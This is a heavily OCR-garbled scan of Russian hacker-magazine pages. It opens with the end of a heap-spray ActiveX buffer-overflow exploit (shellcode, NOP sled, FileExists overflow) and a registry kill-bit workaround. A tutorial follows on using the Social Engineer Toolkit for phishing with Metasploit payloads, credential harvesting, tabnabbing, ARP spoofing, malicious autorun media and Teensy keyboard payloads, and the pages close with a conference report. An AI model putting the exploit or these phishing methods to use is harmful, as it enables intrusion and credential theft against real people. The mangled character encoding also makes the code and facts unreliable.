06а%и5054%иЪЪ56%иГ347%ис656%и23е8%иГГГГ%и89ГГ%и31с6%и53 
<ЗЬ%и2е68%и6б63%и8964%и41е1%ис1Ъ31%и5656%и5356%и3153%иГес 
0%и40с4%и5350%и5353%и5353%и5353%и5353%иба53%и8944%и53е0 
%и53 53%и5453%и5350%и53 53%и5343%и534Ь%и5153%и87 53%иЬЬМ% 
иб021%иб005%ибРе8%иРРРе%и5ЪРР%ис031%и5048%иЬЪ53%исЪ43%и 
5Р8б%исРе8%иРРРе%и56РР%ие:Ё:87%и12ЪЬ%и6с16Ъ%ие8с10%и:Ё:ес2%и:Ё: 
^^^%ис483%иб15с%и89еЬ" ) ; 

//Готовим Ь.еар-зргау, 90 — пор 
ѵаг ЬідЬк=ипезсаре ( " %и9090%и9090 " ) ; 
ѵаг Пеас1ег=2 0; 

ѵаг зрасе=1іеас1ег+з1іе11 . ІепдГП; 



ѵтЬ.і1е (ЬідЬк , ІепдГЬ. < зрасе) ЬідЬк+=ЬідЬк; 
ѵаг Гі11Ьк=ЬідЬк . зиЬзкгіпд ( 0 , зрасе) ; 
ѵаг Ьк=ЬідЬк. зиЬзкгіпд (0 , ЬідЬк. ІепдкЬ- зрасе) ; 
ѵ/МІе (Ьк. 1епдкк+зрасе<0х40000 ) Ьк= Ьк+Ьк+ГіІІЬк; 
ѵаг шеш=пеѵ^ Аггау ( ) ; 

//Большой массив 

Рог(і=0; і<800;і + +) теш [ і ] =Ьк+з1іе11 ; 
ѵаг ЪиРР= " " ; 

//Большая строка с ОхОС 

Гог ( і = 0 ; і<1540 ; і + + ) ЬиГГ +=ипезсаре ( " %0с%0с%0с%0с " ) ; 

//Переполняем буфер... 

ГагдеГ . РіІеЕхізГз (ЬиГГ) ; 

</зсгірР> 

</ПГш1> 



50ШТІ0М 



Патча нет. Если всежеутебя каким-то образом оказалось данное ПО, 
либоудали, либоустанови КІИ ЬіЕ КІИ Ьіі: запрещает подгружать ком- 
понентчерез браузер, что, в принципе, может помочь. Для установки 
бита нужно зайти в реестр, в ветку НКЕѴ_Е0САЕ_МАСНІМЕ\50ЕТѴѴАКЕ\ 
Місго5оН\Іп1;егпе1: ЕхрІогег\АсйѵеХСотраІіЬіІіІу\, создать там раздел 
62А989СЕ-039А-1 1 О5-86Е0- В9С370762 1 76 и параметр СотрабЬіІНу 
Еіадз.типа ЕЕ0_0ѴѴ0Р0,туда занести значение 0x00000400. т 



ХАКЕР 10 /141/ ю 



► 047 













взлом 



■ ■ Дмитрий « Р 1 д 1 » Евдокимов сізесгд.сот 






СОЦИАЛЬНАЯ 

РЕАЛЬНОСТЬ 

ЗЕТ - лучший набор гениального хакера 





Постепенно человеческие чувства, эмоции, отношения, да и жизнь в целом 
все больше и больше переносятся в мир компьютеров, в мир глобальных 
сетей, в мир нулей и единиц. Зтот мир живет по своим правилам. Правилам, 
которые меняются каждый день, и незнание которых приводит к печальным 
последствиям. Самое ценное здесь - это знание, самое мощное оружие здесь 
- это знание. Мы сами создали этот мир. Мы сами рвемся в него с головой... 
вместе с нашими ѵиІпегаЬіШу... 



мтшіістіом 

Человек — самое слабое звено в системе — это уже давно известно. 
Человек непостоянен, а поступки его предсказуемы. Его действия порой 
необоснованны и не подчиняются никакой логике. Слабость системы 
можно закрыть патчем раз и навсегда, слабость человека — нет. Как 
результат — неограниченный простор для фантазии, цель которой — 
доступ к системе, и дорога, к которой идет через километры проводов и 
радиоволн, а на входе стоит человек. О том, благодаря каким изъянам 
человека можно проникнуть внутрь, читай в «Р5ѴСН0», а я расскажу 
об инструменте, которой поможет сделать эту дорогу более простой и 
комфортной. 



ІТ 15 ВЕАТІРШ. З.Е.Т. 

Так перейдем от слов к делу. А поможет нам в этом Зосіаі Епдіпеег 
Тооікіі (5ЕТ), написанный специалистом по безопасности ОаѵісІ 
Кеппебу (РеИ К], распространяющим его под лицензией СРЕѵ2. 
Данный Іооікіі достаточно недавно появился на свет, но сразу обрел 
популярность и был включен в ВаскТгаск, на котором мы и будем 
производить все манипуляции. Для начала обновим (установим] 5ЕТ 
следующей командой: 

зѵп со кРРр : //зѵп. РЬерепРезР . сот/зосіа1_епдіпеегіпд_ 
СооІкіР /репСезЦ/ехрІоіРз/ЗЕТ 
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Прелесть 5ЕТ заключается в том, что он написан на РуЕЬоп и при 
этом не требует никаких сторонних питоновских модулей, которые бы 
пришлось устанавливать дополнительно. Работа ведется через инте- 
рактивное меню, где лишь необходимо выбирать желаемые пункты 
работы приложения. На каждом шаге меню сопровождается хорошим 
описанием предлагаемых подпунктов, так что справится даже ребенок 
(тут становится немного страшно :)]. Для своей работы, помимо интер- 
претатора РуЕЬоп, 5ЕТ использует много сторонних проектов, которые 
уже есть в составе дистрибутива: МеЕазрІоіЕ, еНегсар, зепбтаіі, арасбе 
и др. Можно, конечно, обойтись и без них, но функционал программы 
намного уменьшится. 5ЕТ невидимо для пользователя использует 
сторонние программы, не вовлекая его в премудрости настройки по- 
следних. Но сам ЕооІкіЕ оттюнинговать в некоторых ситуациях просто 
необходимо, и для этого придется обратиться к файлу настроек: 

/репЦезС/ехр1оіЦз/8ЕТ/соп^ід/зеЦ_соп^ід 

В 5еЕ_сопбд по большей части находятся настройки, которые отвечают 
за взаимодействие 5ЕТ и сторонних программ (и их поведения]. Не 
стоит забывать, что это проект ореп-зоигсе, и в нем всегда можно по- 
разбираться, что-то добавить (0-бау например], улучшить и подправить. 
Но давай перейдем к рассмотрению арсенала 5ЕТ, ведь именно это тебе 
не терпится сделать. 

Итак, 5ЕТ предоставляет собой функционал для проведения четырех 
основных векторов атаки: 

Основные вектора атаки 5ЕТ 

• Е-МАІЬ АТТАСК ѴЕСТОЕ 

• МЕВ АТТАСК ѴЕСТОК 

• СБ/БѴО/ІІ8В АТТАСК ѴЕСТОК 

• Теепзу ІІ8В НІБ АТТАСК ѴЕСТОК 

При проведении атаки через е-таіі используются эксплойты, реализую- 
щие уязвимости типа Еіе іогтаЕ такие как: 

• АсіоЪе ЕІазК Ріауег 1 петлЩипсСіоп ' Іпѵаіісі РоіпСег ТТзе 




БЕТ запущен на Ыокіа N900 



• АсІоЬе СоІІаЬ. соІІесСЕтаіІІп^о Виііііег ОѵегЩІом 

• АсІоЬе СоІІаЬ. деСІсоп Ви^^ег ОѵегОсж 

• АсІоЬе ЦВІС2Бесос1е Метогу СоггирСіоп ЕхрІоіС 

• АсЬэЪе РБЕ ЕшЬеЬЬеЬ ЕХЕ Зосіаі Епдіпеегіпд 

• и другие 

А при атаке через веб-вектор, как это ни удивительно, эксплойты, реали- 
зующие уязвимости в браузерах: 

• ІЖ СоЬе ЕхесиСіоп (М310-046) 

• Неір СепСег Х38 апЬ Сошшапсі ЕхесиСіоп (М810-042) 

• ІЕ іереегз.ЫІ Ьзе АіСег Егее (М810-018) 

• ІЕ ТаЬиіаг БаСа СопСгоІ ЕхрІоіС (М810-018) 

• ІЕ "Аигога" Метогу СоггирСіоп (М810-002) 

• и другие 



ХАКЕР 09 /140/ 10 



► 049 







взлом 





Надежность каждого эксплойта равна его надежности из теіазріоіі, 
как раз в этом моменте и происходит взаимодействие ЗЕТ и теіазріоіі. 
Автор ЗЕТ не пишет своих эксплойтов, а просто позволяет получить 
доступ к проверенным и хорошо зарекомендовавшим себя эксплойтам 
в Меіазріоіі. А теперь давай поподробней остановимся на каждом из 
векторов атак и посмотрим, какие атаки они несут на самом деле, и как 
можно воспользоваться этим на практике... 

Е-МАИ АТТАСК ѴЕСТОР 

Начнем наше путешествие с етаіі-вектора атаки. Для этого в главном 
меню выберем пункт «Зреаг-РЫзЫпд Аііаск Ѵесіогз». В наше время 
сложно представить человека без электронной почты, а без соблазна 
получить что-нибудь на халяву — еще сложней. А когда халява сама при- 
ходит тебе на электронный ящик — это вообще не жизнь, а сказка. Для 
начала нужно определиться с количеством целей, ведь ЗЕТ предостав- 
ляет два режима рассылки: 



Зосіаі Епдіпеегіпд СТР 



Данное событие впервые произошло не та к давно, а именно — на 
БЕРСОИ 18 в Ріѵіега НоІеІ& Сазіпо в ЕазѴедаз, штат Ыеѵасіа. Орга- 
низаторами этого состязания были 5осіа I- Епдіпеег. Огд и ОІІепзіѵе 
Зесигііу. Всем участникам были розданы целевые компании, инфор- 
мацию о которых им необходимо было добыть, используя свои навы- 
ки в области социальной инженерии, итолькозаконными способа- 
ми. При этом участникам запрещалось выдаватьсебя за работников 
государственных учреждений, правоохранительных органов или 
юридических лиц, атакже нельзя было связываться с родственника- 
ми сотрудников компаний. Азадачей участников был, каки влюбом 
СТР, захват флагов, нотолько флаги тутбыли необычные. В качестве 
флагов использовались: название кофе-машины в компании, на- 
звание браузера, антивируса и их версии, и даже то, кто обрабатыва- 
ет информацию в шредере и многое другое, но никакой финансовой 
информации, паролей пользователей и персональныхданных.так 
как целевые компании были реальными, а не вымышленными. Но 
самым дорогим флагом было заставить сотрудника компании посе- 
тить определенный ИРІ Стоит отметить, что среди компаний были 

такие монстры, какбоодіе, ВР, МсАІее, Зутапіес, ЗНеІІ, Місгозоіі, 
Огасіе, Сізсо, Арріе и ѴѴаІтагІ. Каксказали организаторы, соревно- 
вание прошло хорошо, даже очень хорошо :). 

Хочется также упомянуть компанию Оідіііаі Оеіепзе, которая даже 
разослала всем своим клиентам предупредительное письмо с заго- 
ловком «ѴѴагпіпд Редагбіпд О ЕЕ СО N 18 Зосіаі Епдіпеегіпд Сопіезі», 
в котором призывала их бытьочень бдительными на время данного 
мероприятия. 

I 



• Индивидуальная рассылка 

• Массовая рассылка 

Для массовой рассылки необходим заранее сформированный файл со 
списком целевых адресов. Формат данного файла очень прост — один 
адрес на строку, и находится он в /репІезі/ехрІоіІз/ЗЕТ/сопІід/таіІіпдДізІ. 
Іхі. Атак все сродни написанию обычного письма — необходимо за- 
полнить тему письма и его содержание. В принципе, чтобы каждый раз 
не повторять один и тот же ввод, можно сделать шаблон и в дальнейшем 
использовать его при необходимости. Что касается отправки письма, то 
тут есть три варианта: 

• Сшаіі- аккаунт 

• Свой Зепсітаіі ореп-геіау 

• Чей-то ореп-геіау сервер 

Как видишь, есть варианты на любой вкус: можно отправить письмо 
через свой В та і 1-аккаунт, не выходя из ЗЕТ, воспользоваться Зепсітаіі- 
сервером, который будет автоматически поднят ЗЕТ на ВаскТгаск, и 
слать через него, либо заранее найти ореп-геіау в интернете. 

Чтобы определить, является ли ЗМТР-сервер ореп-геіау, можно восполь- 
зоваться готовым ЫЗЕ-скриптом ІЧтар: 

пшар --зсгірр зтСр- ореп-геіау . пзе <Ъ.озС> 

Благодаря ореп-геіау можно отсылать письма с чужих адресов, но не 
стоит забывать, что у жертвы может использоваться механизм «геѵегзе 
Іоокирз», который способен определить соответствие доменного имени 
отправителя письма. 

Боевая нагрузка (Меіегргеіег Реѵегзе_ТСР, Реѵегзе ѴІ\ІС, РеѵегзеТСР 
ЗбеЩ вместе с эксплойтом прозрачно выбираются из теіазріоіі и идут 
внутри присоединенного к письму РБЕ-файла, который может быть как 
заготовкой ЗЕТ, так и любым твоим РБЕ-вложением. Остается поднять 
Іізіепег и ждать, пока человеческий фактор сыграет злую шутку. 

ѴѴЕВ АТТАСК ѴЕСТОР 

Данный вектор атаки предоставляет нам более интересные, изо- 
щренные и разноплановые способы атаки пользователей, чем первый. 
Говоря о способе через веб, можно выделить и общую черту (с един- 
ственным исключением], проходящую через атаки этого типа — исполь- 
зование поддельной веб-страницы на автоматически поднимаемом 
веб-сервере. Хотя современные браузеры и стараются бороться против 
поддельных сайтов, окончательное решение о том, доверять или не 
доверять сайту, принимает человек, а порой просто подводит человече- 
ская невнимательность. 



теІазрІоіЫакеІІрсІаІе 



Хакер под ником дОітіІ к написал небольшой, но очень интересный 
ЬазЬ-скрипт — теІазрІоіІ-ІакеБрсІаІе, который позволяете по- 
мощью поддельного окна обновления, говорящем о необходимости 
установить раіеб для закрытия критической уязвимости (есть под- 
держка Біпих, 05Х, ѴѴіпсІоѵѵз], протроя нить жертву. Для этого скрипт 
автоматически поднимает БНСР и веб-сервер, запускает ОЫЗЗрооІ 
и АРРЗРооІ, из-за чего жертва никакие может попасть на желаемый 
сайт, а постоянно видит поддельное окно с просьбой установить 
патч. Нам лишь остается ждать, когда жертва падет под нашим 
натиском и установит«обновление». Ну, а затем наш «патч» за- 
пускает выбранную нагрузку. На выходе мы можем получить консоль 
теіегргеіег и 5ВБ (Зесиге ВаскБоог] или ѴІ\ІС, ну, или, собственно, 
прописанный Ьаскбоог. Также есть возможность указать необходи- 
мый зпіГГег из набора сіпзііі, чтобы смотреть, что делаетжертва. Как 
можно заметить, весь набор данного софта уже предустановлен во 
всеми любимом ВаскТгаск. 

і 
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Как упоминалось ранее, 5ЕТ прекрасно работает в связке с 
еНегсар, и чтобы пользователь не заметил подвоха в адрес- 
ной строке, можно применить АРР-зрооЕпд. В таком случае 
жертва вместо оригинального сайта попадает на наш 
поддельный сайт. Естественно, жертва должна находиться в 
нашей же подсети. 

Также заманить пользователя на наш сайт можно с по- 
мощью Х55, етаіі-рассылки, звонка из техподдержки 
провайдера... В принципе, здесь дело ограничивается лишь 
твоей фантазией. Говоря о почте, стоит вспомнить о первом 
векторе атаки, который может прекрасно работать и через 
веб. Для этого при рассылке в текст письма добавляем ІІРЕ, 
предварительно сжатый с помощью сервиса ѵѵѵѵѵѵ.ЫЕІ.ѵ (или 
ему подобным). Естественно, вектор атаки через почту не 
предоставляет возможности отправки нормального файла, 
но никто не мешает после создания файла подменить 
его на нормальный в / реп1:ез1;/ехрІоі1:5/5ЕТ/5гс/ргодгат_ 

) и п к/< па т е_Е Іе > . рбЕ 

Так как данный вектор сводится к созданию подложного 
сайта и заманиванию на него жертвы, то 5ЕТ берет на себя 
первую часть плана и справляется с ней на «отлично», пре- 
доставляя нам три варианта создания такого типа сайтов: 

• Заготовки Сшаіі, Соодіе, РасеЬоок, Тѵ^іССег 

и Цаѵа Ке<диігес1 

• Клонирование сайта 

• Собственный сайт 

Среди сайтов-заготовок, наверное, стоит остановиться 
только на «баѵа РедиігесІ», при попадании на который 
появляется страничка с сообщением, что для ее про- 
смотра необходима баѵа, и подробная инструкция о том, 
как ее установить. Лучше всего данный шаблон выбирать 
при проведении атаки баѵа АррІеС но об этом чуть позже. 
Второй режим самый лакомый — это полное клонирование 
веб-страницы любого сайта. Для этого достаточно лишь 
сообщить ЬоІкіСу необходимый ЦІ РЕ, а дальше — дело 
техники. Через несколько секунд мы уже имеем копию 
любой веб-страницы. И последний режим дает возможность 
поднять свой собственный сайт, указав лишь директорию 
на диске, где он расположен. Здесь можно развернуть 
как какой-нибудь большой сайт, так и просто страницу с 
ошибками «404», «Идут профилактические работы», «Идет 
загрузка ...», «Содержание данного сайта несовместимо с 
вашим браузером, попробуйте открыть ссылку с помощью 
ІЕ». Главное, чтобы жертва ничего не заподозрила и как 
можно дольше пробыла на сайте. 

Первое, что мы видим, зайдя в пункт ѵѵеЬ-аЛаск — это 
ТЬе баѵа Арріеі атака. баѵа Арріеі спуфит поддельный баѵа 
Сегіііісаіе, и, если цель принимает его, на ней запускается 



теіазріоіі рауіоасі. Самым главным достоинством данного 
метода является то, что нас не интересует, какой ОС и каким 
браузером пользуется пользователь, главное, чтобы у него 
на машине стояла баѵа. За такой замечательный баѵа Арріеі: 
мы должны сказать спасибо ТЬотаз ѴѴегіЬ. 

Ну и, конечно, эксплуатацию уязвимостей браузеров никто 
не отменял, и для этого есть пункт «ТЬе Меіазріоіі Вгоѵѵзег 
Ехріоіі МеіЬосІ». Здесь ЗЕТ на созданную нами страницу 
помещает эксплойт, который будет ждать своего часа. Так 
как большинство новых эксплойтов пробивают к ІЕ (не факт, 
что жертва им пользуется), то можно, применив социальную 
инженерию, заставить юзера зайти по ссылке именно с по- 
мощью ІЕ — как показывает практика, это вполне возможно. 
Метод «Сгебепііаі Нагѵезіег» очень прост как в реализации, 
так и в применении, ведь его задача заключается в сборе 
всей информации, которую ушастый юзер ввел на странице 
подготовленного нами сайта. Так что с его помощью очень 
просто слить аутентификационные данные ничего не подо- 
зревающего пользователя. 

У многих людей при серфинге интернета открыто мно- 
го вкладок: для часто посещаемых сайтов, чтобы что-то 
просмотреть в будущем и т.д. С большим количеством 
открытых вкладок и с течением времени достаточно трудно 
вспомнить, что открыл сам, а что скинули посмотреть по 
мессенджеру 100, Зкуре, баЬЬег или е-таіі. Как раз на это 
и рассчитана ТаЬпаЬЬіпд-атака. Данная атака формирует 
специальную страницу, на которой первоначально красуется 
надпись «Ріеазе ѵѵаіі: ѵѵбііе Пае зііе Іоасіз...», а затем, когда 
пользователю надоедает ждать загрузки страницы, и он 
переключается на другую вкладку в браузере, наша под- 
готовленная страница изменит свой вид на вид страницы от 
популярного почтового сервиса, куда мы хотим позаимство- 
вать аутентификационные данные. Уже в следующий раз, 
когда жертва будет просматривать свои вкладки, она нат- 
кнется уже на сильно знакомый ему интерфейс и, возможно, 
захочет проверить свою почту в данном окне (не набивать 
же адрес заново в новом). А дальше наша страничка рабо- 
тает аналогично методу Сгебепііаі Нагѵезіег. Да, и начиная 
с версии 5ЕТ 0.6.1 , стало возможно использовать ЭВИ (как 
самоподписанный, так и заранее купленный сертификат). 
Так что атака может стать еще более мощной и красивой. 
Метод «Мап ИеН іп Пае МібсІІе Аііаск» был внесен в Іооікіі 
человеком с ником Кос и использует НТТР РЕЕЕРЕР для 
сбора данных из полей, которые пользователь заполнил 
на сайте. Этот метод является единственным, для которого 
можно не создавать поддельный сайт, но необходимо на- 
личие уязвимости типа Х55 на реальном сайте, данные с 
которого нас интересуют, для ее проведения. Получается, 
что мы просто используем Х55 на реальном сайте в режиме 
Сгебепііаі Нагѵезіег и получаем нужный нам ргоііі. 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

• зестапіас.сот — 

сайт Оаѵіб Кеп- 
пебу ( Ре Е 1 К), автора 
Эосіаі-Епдіпеегіпд 
Тооікб (5ЕТ) 

• оііепзіѵе-зесигііу. 
сот/теіазріоіі- 
ипІеазбеб/ЗосіаІ- 
Епдіпеегіпд-Тооікіі: 

— сайт Меіазріоіі: 
Еіпіеазбеб об 
использовании 5ЕТ 

• зосіаі-епдіпеег.огд 

— сайт о Ехріоібпд 
Нитап ѴиІпегаЬіІіЕез 

• дОітіІ к.ЫодзроЕ 
сот/201 0/05/зсгі рЕ- 
ѵібео-теіазріоіі- 
ІакеирбаІе-ѵО1 1 .Ыті 

— запись 

в блоге дОітіІ к, 
автора теіазріоіі- 
Іакеіірбаіе 




• Последняя 
актуальная версия 
5ЕТ на момент 
выхода статьи — 
ѵО.6.1 



• Ореп-геіау — это 
когда почтовый 
сервер разрешает 
пересылку почты 
куда угодно и кому 
угодно. 




> ѵѵагпіпд 

Внимание! 
Информация 
представлена 
исключительно 
с целью 

ознакомления! Ни 
автор, ни редакция 
за твои действия 
ответственности не 
несет! 
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СО/ОѴО/О АТТАСК ѴЕСТОВ 

Далеко не у всех в настройках отключена автозагрузка, да и 
І_І\ІК-эксплойт во всю свирепствует, так что данное направление 
проникновения в систему до сих пор представляет определен- 
ный интерес. 5ЕТ позволяет создать необходимый материал для 
такой атаки. Для этого необходимо воспользоваться пунктом меню 
ІпІесЬоиз Мебіа бепегаіог, который любезно поинтересуется о 
твоих предпочтениях в рауіоаб, Епсобег, количестве итераций 
кодирования нагрузки (для АѴ Ьуразз] и порта для геѵегзе-соппесЕ 
В результате в корневой папке 5ЕТ появится папка аібогип с двумя 
файлами: ргодгат.ехе (наш рауіоаб) и аіЛогип.іпб запускающий 
ргодгат.ехе. Записываем полученный материал на СВ/ВѴВ/І65В и 
подсовываем жертве. 

ТЕЕИЗУ О НЮ АТТАСК ѴЕСТОР 

Благодаря ІгопВеек и ѴѴіпЕапд в ЗЕТ появился такой изощренный 
вектор атаки, какТеепзу 115В НЮ (Ьитап іпіегіасе беѵісе). Правда, 
для этого придется немного раскошелиться, но это того стоит. Теепзу 
— это очень маленькое программируемое устройство с тіпі-ІІЗВ 
интерфейсом. Теепзу 165В на борту имеет АѴР-процессор с часто- 
той 16 МГц, флеш-память 32-128 Кб, РАМ-память 2,5-8 Кб и стоит 
этот малыш $18-27, в зависимости от модели. Прелесть данного 
устройства заключается в том, что оно является программируемым 
и определяется в системе как ІІЗВ-клавиатура, что как следствие, 
позволяет обойти любой запрет на автозагрузку и т.д. Оно также 
не нуждается в специальных драйверах и, имея очень маленький 
размер, может быть незаметно установлено на компьютер, пока 
хозяин машины отвлекся. И это еще не все — устройство обладает 
таймером и датчиком, что дает возможность запуска начинки при 
определенных условиях. Единственным недостатком является то, что 
оно определяется в системе немного дольше, чем обычное 115В 113 
устройство. В общем, дело осталось за малым — залить нужную нам 
нагрузку в рбе-формате на Теепзу. Вот тут как раз нами поможет 5ЕТ, 



и 



••-■у 1+4 |п '№РІ№ 
■ Ьгініі шпіішіи 






Сообщение о критической уязвимости, 
создаваемое пггіи 

он генерирует нашу нагрузку в Іеепзу.рбе, который затем с помощью 
Агбиіпо ЮЕ и Теепзу Боабег по 115В заливается на устройство. Стоит 
отметить, что в качестве нагрузки можно использовать РоѵѵегзЬеІІ 
НТТР (ЗЕТ М5Е, ѴѴ5СПІРТ НТТР СЕТ М5Е и РоѵѵегзЬеІІ Ьазеб Реѵегзе 
5ЬеІІ. Если данного набора тебе недостаточно, то можно написать 
свой рауіоаб на С или воспользоваться Агбиіпо ЮЕ, которое по- 
нимает 115В НЮ оиі оі Юе Ьох! Теперь в манере агента 007 (никаких 
убийств, только незаметность] получаем физический доступ к систе- 
ме и незаметно, элегантно оѵѵп'им ее. 

СОІШЗІОМ 

Как видишь, социальная инженерия набирает новые обороты — благо- 
даря ей можно добиться того, чего не сможет ни один эксплойт. А с при- 
влечением автоматизированных средств это становится сделать намного 
более просто и массово, так что пробив растет. Растет и количество 
пользователей ПК, а вот компьютерная грамотность — только падает. И 
это только начало, мой друг, это только начало... □с 
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Мировые достижения элитного взлома 

В этой статье я поведаю тебе об одной очень хорошей и известной конференции 
- Наск Іп ТНе Вох. В ней ты узнаешь, что происходит на таких конференциях, 
кто выступает с докладами, а также что творится помимо докладов... Ну и, 
конечно же, узнаешь много новых и интересных хакерских методик, любезно 
отобранных для тебя из элитных выступлений. 



ВПЕРЕД! 

Итак, начнем с того, что наша исследовательская лаборатория в соста- 
ве двух человек, таких как я и всем известный мой коллега, Алексей 
Синцов, с двумя разными докладами была приглашена на конферен- 
цию Наск Іп ТЬе Ьох в Амстердаме. Событие на самом деле знаковое, 
так как по факту никто из русских исследователей (имею в виду живу- 
щих в России] на столь значимых конференциях не выступал, кроме, 
разве что, Криса Касперски, но кто-то же, в конце концов, должен 
рассказать всему миру, что в России живут не только Блекхаты, но и 
интеллигентные и образованные этичные хакеры, чем мы собственно 
и занимаемся на международных конференциях, коих уже было посе- 
щено немало. И все они произвели довольно приятные впечатления, 
за исключением естественно вечных шуток про русских хакеров, и что 
русским неплохо бы вообще закрыть доступ в интернет (слова Микко 
Хайпонена из Езесиге, произнесенные на конференции Т2 в Финлян- 
дии), что уже порядком поднадоело, ибо за державу-то обидно. 
Путешествие было с пересадкой в Германии, откуда я прямиком на 
поезде направился в Амстердам, где удалось комфортно поработать и 
доделать свою презентацию, так как, естественно, все лучшее делает- 
ся в последний момент. В очередной раз замечаю, что организаторы 
конференций выбирают для их проведения интересные места (Амстер- 
дам, Лас-Вегас, Дубай] и еще не скупятся на места проведения, так 
что все очень на высоком уровне, хоть и конференции некоммерче- 
ские. 



Итак, хватит вводных слов, лучше посмотрим, кто же выступал на 
конференции, и пройдемся по наиболее интересным, на мой взгляд, 
докладам. Те, что я не осветил, ты всегда можешь скачать в интернете 
и разобраться в них самостоятельно, более того — архив со всеми 
докладами прилагается к диску. На конференции выступали такие 
специалисты, как Антон Чувакин (независимый консультант, бывший 
работник Сіиаіуз], Баигепі; ОиГбоІ: (директор компании ТЕТНВІ ЗесигИу), 
Федор Ярочкин (наш соотечественник, эмигрировавший в 2000-х в 
Тайланд, и автор знаменитой ХРгоЬе], Заотиіі ЗЬаЬ (из ІЧеГЗциаге] и, 
конечно же, представители ОЗесРО. Итак, начнем с более общего опи- 
сания докладов, самые интересные из которых мы в конце рассмотрим 
подробнее. 

ОБО ВСЕМ ПОНЕМНОГУ 

Конференция началась со вступительного слова Антона Чувакина, из- 
вестного эксперта в области безопасности, специализирующегося на 
вопросах РСІ Б55 и лог-мэнеджмента. В докладе была освещена его 
любимая тема — соответствие стандартам и реальная безопасность. 
Его мессадж был в том, чтобы, наконец, начать строить мосты между 
двумя разными подходами: Сотрііапсе Еігзі; и ЗесигКу ЕігзЕ Еще 
один наш соотечественник, Федор Ярочкин, автор известной утилиты 
Х-РгоЬе и, по совместительству, просто классный парень, рассказывал 
о русских блекхатах и криминалах, объясняя по ходу презентации, что 
значат такие термины, как картон, дроп и прочее. Для нас, конечно, 
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Корабль, на котором проводилась АНеграгТу конференции НІТВ 



все это не ново, но европейцам, видать, было очень интересно. 

К сожалению, эту я презентацию пропустил, так как сам в это время 
был на параллельном треке — рассказывал про безопасность ЕКР- 
систем на примере 5АР, показывая, как легко можно через клиентов 
5АР получить доступ к корпоративным секретам компании, используя 
нашу тулзу — за ргрІоМ;. Помимо этого мне также удалось дать неболь- 
шое интервью для ВВС Рабіоі о безопасности ЕРР, но это уже совсем 
другая история. Кроме презентации про русских криминалов Федор 
также рассказывал о новой версии своего старого детища — ХргоЬе- 
N0. Для тех, кто в танке, или уже успел позабыть, рассказываю. ХРгоЬе 
в олдскульные времена была культовой программой, используемой 
для удаленного определения версии ОС, качественно отличаясь от 
того же ІМтар количеством посылаемых пакетов (в меньшую сторону, 
что очень даже важно при анализе больших подсетей]. В новой вер- 
сии появилось множество нововведений, и вот часть из них: 

1. Определение не только ОС, но и различных девайсов, таких как 
кэширующие системы, прозрачные прокси, ханипоты, виртуальные 
машины, свичи, системы обнаружения и предотвращения вторжений, 
файерволы уровня приложений и даже хосты, реализующие спуфинг 
атаку; 

2. Определение версии ОС на основе приложений и корреляция 
данных; 

3. Поддержка ІРѵб; 

4. Улучшенный движок, минимизирующий необходимое количество 
посылаемых пакетов. 

В целом звучит неплохо, жаль только, что не все эти нововведения 
доступны, поскольку еще находятся в разработке. Будем надеяться на 
их скорейшее появление, пожелаем удачи Федору и не забываем за- 
глядывать на сайт его проекта — эУ/хргобе.зоигсеіюгде.пеС 
Нельзя не отметить моего коллегу, Алексея Синцова, который собрал 
немало народу на своем выступлении, описывая особенности на- 
писания шеллкода для метода ЛіЗргау, в итоге в разы увеличив ско- 
рость его работы, а также показав, что это проблема не только РІазЬ , 
но и любого ЛТ-компилятора. Кроме того, он продемонстрировал 
(почти успешно :] атаку на последнюю версию ЛТ-компилятора 
в браузере Арріе 5аба гі . Подробности ты можешь прочитать в 
предыдущем номере. От себя добавлю, что бессонные ночи над этой 




Главный холл конференции, где можно было 
пообщаться с коллегами по всему миру 



презентацией были проведены Алексеем не зря — народу действи- 
тельно понравилось. 

Следующий доклад, о котором хотелось бы рассказать, назывался 
«Ноѵѵ Іо гаіе 1Ле зесигііу о^ сіозесі зоигсе зоЛѵѵаге», и рассказывал 
его один мой знакомый, Місбаеі Тбитапп из компании ЕКІЧѴѴ. 

Этот доклад я приметил еще на конференции Тгоорегз, когда он 
был рассказан впервые. Идея его такова: представь себе, что тебе 
необходимо оценить безопасность и уровень доверия для крупного 
проекта. Реально крупного проекта, к примеру, порядка тысячи би- 
нарников. Необходимо ответить на вопрос: можем ли мы доверять 
этой программе обработку наших критичных данных? Стандартные 
подходы, такие как фаззинг, реверс-инжиниринг и сандбоксинг, не 
подходят — слишком ресурсоемко, и требует обученного персона- 
ла. Что же делать? Ответ прост — в качестве альтернативы пред- 
лагается использовать различные метрики, получая в результате 
по всем проверкам некий общий индекс под названием Тбитапп’з 
ТгизПл/огіФіпезз Іпбех. Остается только разобраться, какие метрики 
использовать. Автор предлагает следующие: 

Проверка использования в библиотеке БЕР (разработано) ; 

Проверка использования в библиотеке АЗЬК (разработано) ; 
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Проверка использования в библиотеке ЗаНеЗЕН (разрабо- 
тано) ; 

Проверка версии линковщика (разработано) ; 

Проверка, скомпилирована ли библиотека с опцией /С 3 
(в разработке) ; 

Проверка, используется ли упаковщик (в разработке) ; 
Проверка на использование небезопасных функций (в 
разработке) ; 

Проверка на использование сетевых функций (в разра- 
ботке) ; 

Проверка на обращение к реестру (в разработке ) % 
Проверка на создание файлов (в разработке) ; 

Проверка на наличие подписи кода (в разработке) ; 

Прочие проверки. 

Прелесть заключается в том, что докладчик представил тулзу, 
которая осуществляет ряд этих проверок и выдает сводный индекс 
доверия к анализируемой программе. Утилита запускается очень 
просто, достаточно указать ей директорию, и она выдаст результат 
по всем файлам. В качестве подопытного была проанализирована 
папка браузера Рі гебох. Результат получился смешанным — часть 
библиотек имеют высокий уровень доверия и скомпилированы с 
использованием ОЕР и А5І_П, а часть — нет. На них, собственно, и 
стоит обратить внимание на следующем, уже более глубоком этапе 
анализа безопасности софтины, так как, найдя в них уязвимость, 
эксплуатировать ее будет гораздо проще. В общем, неплохая по- 
лучилось утилита, жаль только, что пока немного проверок включе- 
но, но, будем надеяться, что в скором времени она продолжит свое 
развитие. 

ЗАГАДОЧНАЯ КОРОБКА 

Следующая лекция, которую у меня получилось посетить, была о 
новом устройстве под названием капе-Ьох, о котором поведал ее 
разработчик, ЗоЬп Капеп Ріоѵѵегз. Устройство представляет собой 
систему обнаружения вторжений, а точнее — даже смесь роутера, 
Ю5/ІРЗ, да еще и с возможностью анализа беспроводных сетей. Ка- 
залось бы, ничего нового, но вся система основана на ОрепВоигсе, 
включая приложение, операционную систему и даже железо. Да-да, 
термин ореп зоигсе Ьагбѵѵаге появился недавно и стремительно 
